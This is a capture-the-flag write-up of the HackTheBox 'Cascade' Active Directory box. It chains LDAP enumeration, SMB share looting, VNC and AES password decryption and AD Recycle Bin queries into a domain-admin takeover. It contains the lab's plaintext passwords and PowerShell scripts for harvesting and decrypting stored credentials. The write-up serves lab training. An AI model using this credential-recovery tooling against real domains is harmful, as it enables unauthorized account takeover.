HackTheBox Cascade Writeup – 10.10.10.182

HackTheBox Cascade (10.10.10.182) is a recent Windows box by VbScrub. As on previous Windows machines, a handful of very well-known tools carry you through Cascade up to the user flag; after that the methodology changes completely. This is the first time I have dealt with a SQLite database on an HTB Windows box. The initial foothold can be a bit tricky, but it is worth the effort. If you are in the Windows business it is a review of your skills, and for Linux people it is a great way to learn to attack Windows AD infrastructure.

Cascade is all about enumeration: pulling the right users from AD, finding a password for one of them, decoding it, reading directories over SMB, reading a registry export, and finding the right tools to decrypt yet another password. Reverse engineering is something I always hate, but to find your way in here it is mandatory to RE the binary and get the keys that unlock the main door.

So, lets get started.

Enumeration

As with every other machine, I added the machine IP 10.10.10.182 to my hosts file as cascade.htb, fired up my terminal and ran an Nmap scan.

# root @ ns09 in ~/htb/cascade [19:34:46] 
$ nmap -sV -p- -oA cascade.nmap cascade.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-30 19:59 +03
Nmap scan report for cascade.htb (10.10.10.182)
Host is up (0.14s latency).
Not shown: 65520 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-30 17:08:38Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 580.49 seconds

# root @ ns09 in ~/htb/cascade [20:08:56]

OK, here we have the usual Windows AD footprint: DNS, Kerberos, LDAP (plain and global catalog), SMB, RPC and WinRM on 5985 are all open. Rather than chase every open port, I ran enum4linux, a great Windows enumeration tool that ships with Kali Linux.

Initially I ran the full enum4linux, but I was overwhelmed by the amount of information the machine returned, so I ran the tool again to get just the available users.

There are 15 users in total:

user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]

Next, I used ldapsearch to gather as much information as possible from the Cascade AD, with an anonymous bind since I had no credentials yet. ldapsearch returns a huge amount of data, so it is always best practice to redirect the output into a file and grep through it afterwards.

And here is what I was looking for: an attribute on the R.Thompson user object that holds a credential.

The value is Base64 encoded, and a simple decode from Kali exposes the real password.

The exposed credentials: r.thompson@cascade.local:rY4n5eva
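The step above (find a base64-looking attribute value in the LDAP dump and decode it) is easy to do by hand for one user, but it is worth automating over the whole dump so nothing is missed. The script below is an added example, not code from the post: it scans an LDIF dump such as `ldapsearch -x -H ldap://cascade.htb -b 'DC=cascade,DC=local' > ldap.txt` would produce, tries every value that looks like base64, and reports only those that decode to printable ASCII. The sample LDIF embedded in it is constructed: the r.thompson value is the one the post decodes, the attribute name that carries it (cascadeLegacyPwd) is an assumption since the post does not name it, and the objectGUID values are made up so the filter has binary data to reject.

```powershell
# Added example (not from the original post). Sample LDIF is constructed; the
# attribute name cascadeLegacyPwd is an assumption, the GUIDs are made up.
$ldif = @'
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: user
sAMAccountName: r.thompson
objectGUID:: KkPa2mlTnkaDhcGg1gxfqA==
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: user
sAMAccountName: s.smith
objectGUID:: 4a2hl9wUAEe2gEzC1t3xTQ==
'@

function Find-Base64Attribute {
    param([Parameter(Mandatory)][string]$Ldif)
    $dn = $null
    foreach ($line in ($Ldif -split "`r?`n")) {
        if ($line -match '^dn:\s*(.+)$') { $dn = $Matches[1]; continue }
        # "attr:: value" is LDIF's own base64 form for binary data; a plain
        # "attr: value" can still hold a base64 string that was stored as text,
        # which is the case with the legacy password on this box.
        if ($line -notmatch '^([A-Za-z][\w-]*)(::?)\s*(\S+)\s*$') { continue }
        $attr, $sep, $value = $Matches[1], $Matches[2], $Matches[3]
        if ($value -notmatch '^[A-Za-z0-9+/]+={0,2}$' -or ($value.Length % 4)) { continue }
        try { $text = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($value)) } catch { continue }
        # GUIDs, SIDs and short words like "user" read as base64 decode to
        # control or non-ASCII characters; keep only fully printable results.
        if ($text -notmatch '^[\x20-\x7e]+$') { continue }
        [pscustomobject]@{ DN = $dn; Attribute = $attr; LdifEncoded = ($sep -eq '::'); Encoded = $value; Decoded = $text }
    }
}

# Usage against the embedded sample; point $Ldif at (Get-Content ldap.txt -Raw) for a real dump.
Find-Base64Attribute -Ldif $ldif | Format-Table -AutoSize
```

Against the sample, the only row returned is the r.thompson attribute, and its Decoded column is the rY4n5eva password from the post; the two objectGUID values and the objectClass values are rejected by the printable-ASCII check. Run on a full dump, the same filter also surfaces any other object that carries a value of this kind.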

Next, I tried SMB with r.thompson's credentials, and that was the right move.

It took a while, and I proceeded to enumerate the shares and directories one by one. Since IT was the low-hanging fruit, I started with the IT directory.

An Email:

This email says that a TempAdmin user had been created with the same login credentials as the system administrator. So, if I can find TempAdmin's password, I have the administrator's password.

A piece of a log from ArkAdRecycleBin.log. It shows the service account ArkSvc moving two users, “Test” and “TempAdmin”, into the AD Recycle Bin. That is interesting: the email and this log tie together in the later steps.

# root @ ns09 in ~/htb/cascade [21:22:30] 
$ cat ArkAdRecycleBin.log
1/10/2018 15:43	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43	[MAIN_THREAD]	Validating settings...
1/10/2018 15:43	[MAIN_THREAD]	Error: Access is denied
1/10/2018 15:43	[MAIN_THREAD]	Exiting with error code 5
2/10/2018 15:56	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56	[MAIN_THREAD]	Validating settings...
2/10/2018 15:56	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
2/10/2018 15:56	[MAIN_THREAD]	Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Exiting with error code 0	
8/12/2018 12:22	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22	[MAIN_THREAD]	Validating settings...
8/12/2018 12:22	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
8/12/2018 12:22	[MAIN_THREAD]	Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Exiting with error code 0
# root @ ns09 in ~/htb/cascade [21:22:35] 

There is another log file under DCs, dcdiag.log, which shows a dcdiag connectivity test run against the domain controller CASC-DC1 (the host itself, per the Nmap service info).

After a while, I found a registry export in \IT\Temp\s.smith\VNC Install.reg. I downloaded it and cat'ed it; it holds the VNC password as a hex value.

I tried online hex decoders first, but it did not take long to realise the hex is not plain text but a VNC password. VNC products encrypt the stored password with DES under a fixed, publicly known key that is identical in every installation, so anyone who can read the registry value can recover the password. I found a tool online that does exactly that.

And the password was successfully decrypted:
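Rather than trust an online tool with a recovered credential, the VNC scheme is small enough to reproduce locally. The script below is an added example and is not the tool the post used: it implements the stored-password transform with .NET's DES class. The key is the standard VNC key with the bits of each byte reversed, which is how it has to be fed to a normal DES implementation (VNC's own d3des routine uses the opposite bit order). The hex value from "VNC Install.reg" is not reproduced on this page, so the demo produces its own ciphertext from a constructed password and then recovers it; pass the real "Password" value from the .reg file to Unprotect-VncPassword to decrypt it.

```powershell
# Added example, not from the original post. Fixed VNC DES key (bit-reversed
# per byte for a standard DES implementation). The demo password is constructed.
$VncDesKey = [byte[]](0xE8, 0x4A, 0xD6, 0x60, 0xC4, 0x72, 0x1A, 0xE0)

function ConvertFrom-RegHex {
    # Accepts the value as written in a .reg export ("hex:6b,cf,..."), plain hex,
    # or hex with spaces, and returns the raw bytes.
    param([Parameter(Mandatory)][string]$Hex)
    $clean = ($Hex -replace '^\s*hex(\([0-9a-fA-F]+\))?:', '') -replace '[^0-9a-fA-F]', ''
    if ($clean.Length % 2) { throw "odd-length hex string" }
    [byte[]](0..($clean.Length / 2 - 1) | ForEach-Object { [Convert]::ToByte($clean.Substring(2 * $_, 2), 16) })
}

function New-VncDes {
    $des = [System.Security.Cryptography.DES]::Create()
    $des.Mode    = [System.Security.Cryptography.CipherMode]::ECB   # single block, no chaining
    $des.Padding = [System.Security.Cryptography.PaddingMode]::None # VNC zero-pads to 8 bytes itself
    $des.Key     = $VncDesKey
    $des
}

function Unprotect-VncPassword {
    param([Parameter(Mandatory)][string]$Hex)
    $cipher = ConvertFrom-RegHex $Hex
    if ($cipher.Length -lt 8) { throw "need at least 8 ciphertext bytes" }
    # VNC only encrypts the first 8 bytes of the password; some writers append more.
    $block = [byte[]]$cipher[0..7]
    $des = New-VncDes
    try { $plain = $des.CreateDecryptor().TransformFinalBlock($block, 0, 8) } finally { $des.Dispose() }
    # Passwords shorter than 8 characters were zero-padded before encryption.
    ([System.Text.Encoding]::ASCII.GetString($plain)).TrimEnd([char]0)
}

function Protect-VncPassword {
    param([Parameter(Mandatory)][string]$Password)
    $plain = New-Object byte[] 8
    $src = [System.Text.Encoding]::ASCII.GetBytes($Password)
    [Array]::Copy($src, $plain, [Math]::Min($src.Length, 8))   # truncate to 8, zero-pad
    $des = New-VncDes
    try { $cipher = $des.CreateEncryptor().TransformFinalBlock($plain, 0, 8) } finally { $des.Dispose() }
    ($cipher | ForEach-Object { $_.ToString('x2') }) -join ''
}

# Round trip with a constructed password (hypothetical value, not the box's).
$hex = Protect-VncPassword -Password 'Pa55w0rd'
"stored as:  hex:$($hex -replace '(..)(?!$)', '$1,')"
"recovered:  $(Unprotect-VncPassword -Hex $hex)"
# Real use: Unprotect-VncPassword -Hex '<value of "Password" from VNC Install.reg>'
```

Because the key is the same everywhere, the only secret in this scheme is the registry value itself; any account that can read the VNC registry key or a .reg export of it (as r.thompson could here over SMB) has the password.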

Getting The Shell Using Evil-WinRM and Getting The User.txt

So the next step is straightforward. I used the Evil-WinRM to get PowerShell shell on the box.


As s.smith I ran whoami /all, and the group list pointed me at a share I had not seen before: Audit$.

I used the SMBClient to list the share and here is what it looked like:

# root @ ns09 in ~/htb/cascade [22:06:13] 
$ smbclient //cascade.htb/Audit$ -U s.smith
Enter WORKGROUP\s.smith's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jan 29 21:01:26 2020
  ..                                  D        0  Wed Jan 29 21:01:26 2020
  CascAudit.exe                       A    13312  Wed Jan 29 00:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 21:00:20 2020
  DB                                  D        0  Wed Jan 29 00:40:59 2020
  RunAudit.bat                        A       45  Wed Jan 29 02:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 09:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 09:38:38 2019
  x64                                 D        0  Mon Jan 27 01:25:27 2020
  x86                                 D        0  Mon Jan 27 01:25:27 2020

		13106687 blocks of size 4096. 7793827 blocks available
smb: \> 

The share contains an executable, x64 and x86 directories with native DLLs, a batch file, a DB directory holding the SQLite database, and the System.Data.SQLite DLLs.

I downloaded everything from the share to my Kali machine and then transferred it to my Windows host.

I opened the database Audit.db in EditPlus (the first tool I reach for before anything else) and, to my surprise, saw an encrypted password for the user ArkSvc. Viewed as raw text the row's three columns run together (user name, encrypted password, domain); sqlite3 Audit.db .dump on Kali shows the same row with its table structure intact.

ArkSvcBQO5l5Kj9MdErXx6Q6AGOw==cascade.local

Reverse Engineering Using dnSpy

As the forum and VbScrub hinted, the next step involves reversing the binary CascAudit.exe. I opened it in my favourite tool, dnSpy. Walking through the decompiled code, I found the decryption key in the main module.

Going further, I opened CascCrypto.dll and saw that the Crypto class uses AES; the key length confirmed AES-128. So the ArkSvc password in Audit.db is AES-128 encrypted, and I went looking for a way to decrypt it.

There are plenty of AES-128 decryptors online; I used one of those.

And we have the password.
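Pasting a key pulled out of a binary into a web form hands it to a third party, and it is just as quick to decrypt locally once dnSpy has given you the parameters. The script below is an added example and is not code from the post or from CascCrypto.dll: it decrypts a base64 blob the way a .NET program built on System.Security.Cryptography.Aes with a 16-byte key would have produced it, AES-128 in CBC mode with PKCS7 padding (the .NET defaults) and a key and IV taken from ASCII strings. The key and IV in the demo are constructed stand-ins; the real ones are read out of the Crypto class in dnSpy as described above and are not reproduced here, and the use of CBC (and hence of an IV) is an assumption, since the post names only the algorithm and key size. One check that needs no key at all: BQO5l5Kj9MdErXx6Q6AGOw== is 24 base64 characters, i.e. exactly one 16-byte block, so the plaintext is at most 15 bytes long, which matches w3lc0meFr31nd (13 bytes).

```powershell
# Added example, not from the original post or from CascCrypto.dll.
# AES-128-CBC with PKCS7 padding and string-derived key/IV; key and IV below
# are constructed (hypothetical) values, not the ones in the binary.
function Get-AesFromStrings {
    param([Parameter(Mandatory)][string]$Key, [Parameter(Mandatory)][string]$IV)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = [System.Text.Encoding]::UTF8.GetBytes($Key)   # 16 bytes -> AES-128
    $aes.IV  = [System.Text.Encoding]::UTF8.GetBytes($IV)    # 16 bytes (block size)
    $aes
}

function Unprotect-AesPassword {
    param([Parameter(Mandatory)][string]$Base64,
          [Parameter(Mandatory)][string]$Key,
          [Parameter(Mandatory)][string]$IV)
    $cipher = [Convert]::FromBase64String($Base64)
    if ($cipher.Length % 16) { throw "ciphertext is not a whole number of AES blocks" }
    $aes = Get-AesFromStrings -Key $Key -IV $IV
    try {
        $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
        [System.Text.Encoding]::UTF8.GetString($plain)
    } finally { $aes.Dispose() }
}

function Protect-AesPassword {
    param([Parameter(Mandatory)][string]$Password,
          [Parameter(Mandatory)][string]$Key,
          [Parameter(Mandatory)][string]$IV)
    $plain = [System.Text.Encoding]::UTF8.GetBytes($Password)
    $aes = Get-AesFromStrings -Key $Key -IV $IV
    try {
        [Convert]::ToBase64String($aes.CreateEncryptor().TransformFinalBlock($plain, 0, $plain.Length))
    } finally { $aes.Dispose() }
}

# Constructed key and IV: exactly 16 ASCII characters each (hypothetical values).
$key = '0123456789abcdef'
$iv  = 'fedcba9876543210'

# Round trip: the blob is 24 base64 characters, one 16-byte block, the same
# shape as the ArkSvc value in Audit.db.
$blob = Protect-AesPassword -Password 'w3lc0meFr31nd' -Key $key -IV $iv
"blob:      $blob"
"password:  $(Unprotect-AesPassword -Base64 $blob -Key $key -IV $iv)"

# Real use, with the values recovered in dnSpy:
#   Unprotect-AesPassword -Base64 'BQO5l5Kj9MdErXx6Q6AGOw==' -Key '<key>' -IV '<iv>'
```

A wrong key normally shows up as a padding exception from TransformFinalBlock rather than as garbage output, and a wrong IV in CBC corrupts only the first block, so with a single-block ciphertext like this one the key and the IV both have to be right before anything readable appears.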

Getting The Shell As ArkSvc Using Evil-WinRM


# root @ ns09 in ~/htb/cascade [10:46:16] 
$ ruby evil-winrm.rb -i cascade.htb -u ArkSvc -p w3lc0meFr31nd

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami /all

USER INFORMATION
----------------

User Name      SID                                           
============== ==============================================
cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes                                                     
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group             
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group             
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group             
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group             
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                                                                   

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\arksvc\Documents> 

The group list shows that ArkSvc is a member of CASCADE\AD Recycle Bin, the group that is allowed to read objects that have been deleted from the directory (it is a group, not a share, and not one of the privileges in the last table).

Straight To The Root

Pulling objects back out of the AD Recycle Bin is straightforward in PowerShell. Running a PowerShell query for deleted objects, I found the TempAdmin user among them, the same account that the email in R.Thompson's directory and the deletion entry in ArkAdRecycleBin.log referred to. Per that email, TempAdmin has the same password as the Administrator account.

The password attribute on the deleted object was Base64 encoded (not encrypted); I decoded it from my Kali terminal. The base64 is 20 characters, i.e. 15 bytes, so the password is baCT3r1aN00dles.

# root @ ns09 in ~/htb/cascade [11:30:44] 
$ echo YmFDVDNyMWFOMDBkbGVz | base64 -d
baCT3r1aN00dles
# root @ ns09 in ~/htb/cascade [11:31:02] 
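The query and the decode above, as one added example that is not the script used in the post. It enumerates the Recycle Bin with .NET's DirectorySearcher rather than Get-ADObject, so it works from the Evil-WinRM session even when the ActiveDirectory module is not loaded; it then prints every attribute of the deleted TempAdmin object and decodes any attribute whose value is base64 of printable text. It has to run on the domain as a member of CASCADE\AD Recycle Bin (arksvc above). The post does not name the attribute that carried the value, so nothing in the script depends on that name.

```powershell
# Added example, not from the original post. Run from the arksvc shell on the DC.
function Get-DeletedAdObject {
    param([string]$ExtraFilter = '')
    $searcher = [adsisearcher]"(&(isDeleted=TRUE)$ExtraFilter)"
    # Deleted objects are invisible to a normal search; Tombstone=$true adds the
    # LDAP "show deleted objects" control so they are returned.
    $searcher.Tombstone = $true
    $searcher.PageSize  = 500
    foreach ($result in $searcher.FindAll()) {
        $p = $result.Properties
        # "name" of a recycled object is "<rdn>\0ADEL:<guid>" (as in the log above);
        # the original RDN survives in msDS-LastKnownRDN.
        $rdn = if ($p['msds-lastknownrdn'].Count) { [string]$p['msds-lastknownrdn'][0] } else { $null }
        [pscustomobject]@{
            LastKnownRdn = $rdn
            DN           = [string]$result.Path
            Properties   = $p
        }
    }
}

function Find-Base64Value {
    # Attribute/value pairs whose string value is base64 that decodes to printable ASCII.
    param([Parameter(Mandatory)]$Properties)
    foreach ($name in $Properties.PropertyNames) {
        foreach ($v in $Properties[$name]) {
            if ($v -isnot [string] -or $v -notmatch '^[A-Za-z0-9+/]{4,}={0,2}$' -or ($v.Length % 4)) { continue }
            try { $text = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($v)) } catch { continue }
            if ($text -match '^[\x20-\x7e]+$') {
                [pscustomobject]@{ Attribute = $name; Encoded = $v; Decoded = $text }
            }
        }
    }
}

$deleted = Get-DeletedAdObject -ExtraFilter '(objectClass=user)'
$deleted | Format-Table LastKnownRdn, DN -AutoSize

$tempAdmin = $deleted | Where-Object LastKnownRdn -eq 'TempAdmin' | Select-Object -First 1
if ($tempAdmin) {
    # Every attribute of the deleted object, one per line.
    foreach ($name in $tempAdmin.Properties.PropertyNames) {
        '{0,-28} {1}' -f $name, (($tempAdmin.Properties[$name] | ForEach-Object { "$_" }) -join '; ')
    }
    Find-Base64Value -Properties $tempAdmin.Properties | Format-Table -AutoSize
}
```

The objectClass values ("top", "user", "person" and so on) look like base64 but decode to non-ASCII bytes, so the printable-text check drops them and only genuinely text-bearing values are reported. Recycled objects keep their attributes until the tombstone lifetime expires, which is why a password set on TempAdmin years earlier was still readable here.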

I used Evil-WinRM a fourth time, this time as Administrator with that password, and owned Cascade.

Thank you for reading. It was a great machine, I learned a lot. There were a couple of hiccups but I managed to find the way myself.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

Malfurion
5 months ago

Nice work, finally grabbed the RIGHT hash, weird how the SAM had a different administrator hash to what the lsassdump had. Oh well, live and learn I guess :D. Keep up the hax brother.

Btw, I completely overlooked online decryption, I wrote some C# and decrypted it using the function from the dll. I’m forever over complicating things. Respect man.
